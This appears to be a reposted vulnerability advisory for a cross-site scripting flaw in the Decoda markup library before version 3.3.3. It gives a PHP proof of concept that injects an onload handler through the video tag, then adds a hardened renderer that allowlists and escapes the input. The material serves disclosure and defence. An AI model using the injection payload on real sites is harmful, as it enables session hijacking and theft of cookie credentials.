A cross-site scripting vulnerability exists in Decoda versions earlier than 3.3.3. This vulnerability is caused by improper filtering of user input.
Attackers can exploit this vulnerability to execute arbitrary script code in the browser of an unsuspecting user, in the context of the affected site, steal cookie-based authentication credentials, and then launch further attacks.
Currently, the vendor has not provided any patch or upgrade for this vulnerability. We recommend that users of this software watch the vendor's homepage to obtain the latest version.
The following proof of concept is available:
<?php
// Load Decoda and enable the video filter
include '../decoda/Decoda.php';
$code = new Decoda();
$code->addFilter(new VideoFilter());
?>
<?php
// The tag content starts with a double quote, followed by extra attributes
$decoda_markup = '[video="youtube" size="small"]"';
$decoda_markup .= 'onload="alert(\'redteam Pentesting XSS\');" id="[/video]';
$code->reset($decoda_markup);
echo $code->parse();
?>
This results in the following output (whitespace adjusted):
<iframe src="http://www.2cto.com/embed/" onload="alert('redteam Pentesting XSS');"
id="" width="560" height="315" frameborder="0"></iframe>
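In the output above, the double quote at the start of the tag content closes the src attribute early, so the rest is parsed as attributes of the iframe. The following is an added illustration, not part of the original advisory and not Decoda's code or its fix: it contrasts that unescaped-concatenation pattern with a renderer that allowlists the identifier and escapes for the attribute context. The function names and the embed host are hypothetical.

```php
<?php
// Added illustration; not Decoda's source. Names and host are hypothetical.
const EMBED_BASE = 'https://video.example/embed/'; // constructed placeholder host

// Unsafe pattern: tag content is concatenated into an attribute unescaped.
function renderVideoUnsafe(string $id): string
{
    return '<iframe src="' . EMBED_BASE . $id
        . '" width="560" height="315" frameborder="0"></iframe>';
}

// Hardened: allowlist the identifier, then escape for the attribute anyway.
function renderVideoSafe(string $id): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    // Accept only the characters a video identifier needs.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $id)) {
        // Emit the original markup as inert, escaped text instead of an iframe.
        return htmlspecialchars('[video]' . $id . '[/video]', $flags, 'UTF-8');
    }
    $src = htmlspecialchars(EMBED_BASE . $id, $flags, 'UTF-8');
    return '<iframe src="' . $src
        . '" width="560" height="315" frameborder="0"></iframe>';
}

// Content placed between the [video] tags in the proof of concept above.
$content = '"onload="alert(\'redteam Pentesting XSS\');" id="';

// The quote ends src, so onload becomes a real attribute of the iframe.
echo renderVideoUnsafe($content), PHP_EOL;
// Fails the allowlist and is printed as escaped text, with no iframe emitted.
echo renderVideoSafe($content), PHP_EOL;
// A constructed, well-formed identifier still renders normally.
echo renderVideoSafe('abc123_XYZ-9'), PHP_EOL;
```

The escaping step stays in place even after the allowlist check, so a later loosening of the pattern does not reopen the attribute breakout.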
From 90's Blog